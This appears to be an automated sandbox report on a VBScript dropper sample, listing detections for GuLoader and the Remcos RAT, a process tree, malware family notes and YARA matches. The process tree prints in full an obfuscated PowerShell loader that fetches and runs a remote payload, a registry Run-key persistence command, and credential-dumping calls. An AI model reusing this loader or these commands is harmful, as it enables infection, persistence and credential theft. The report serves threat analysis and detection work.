Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REVISED NEW ORDER 7936-2024.vbs

Overview

General Information

Sample name:REVISED NEW ORDER 7936-2024.vbs
Analysis ID:1435459
MD5:7c07b76a5587795f4b9a2e8c129f656d
SHA1:9296b93c2fc2222407146bda21603d454c339c73
SHA256:720d5e29e7249eea52bd04ba585b9e18908356bbc3cea37920f44b1673ca9ef6
Tags:vbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1612 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3384 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2912 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7256 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7444 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 7520 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7572 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 7828 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7840 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7856 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.2331670219.0000000009450000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2320148012.0000000005A73000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000005.00000002.2332047003.000000000A8C3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 3 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_6868.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x1046e:$b2: ::FromBase64String(
              • 0xd7f3:$s1: -join
              • 0x6f9f:$s4: +=
              • 0x7061:$s4: +=
              • 0xb288:$s4: +=
              • 0xd3a5:$s4: +=
              • 0xd68f:$s4: +=
              • 0xd7d5:$s4: +=
              • 0xfa30:$s4: +=
              • 0xfab0:$s4: +=
              • 0xfb76:$s4: +=
              • 0xfbf6:$s4: +=
              • 0xfdcc:$s4: +=
              • 0xfe50:$s4: +=
              • 0xdf19:$e4: Get-WmiObject
              • 0xe108:$e4: Get-Process
              • 0xe160:$e4: Start-Process
              amsi32_2912.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x103c2:$b2: ::FromBase64String(
              • 0xd7f3:$s1: -join
              • 0x6f9f:$s4: +=
              • 0x7061:$s4: +=
              • 0xb288:$s4: +=
              • 0xd3a5:$s4: +=
              • 0xd68f:$s4: +=
              • 0xd7d5:$s4: +=
              • 0xfa30:$s4: +=
              • 0xfab0:$s4: +=
              • 0xfb76:$s4: +=
              • 0xfbf6:$s4: +=
              • 0xfdcc:$s4: +=
              • 0xfe50:$s4: +=
              • 0xdf19:$e4: Get-WmiObject
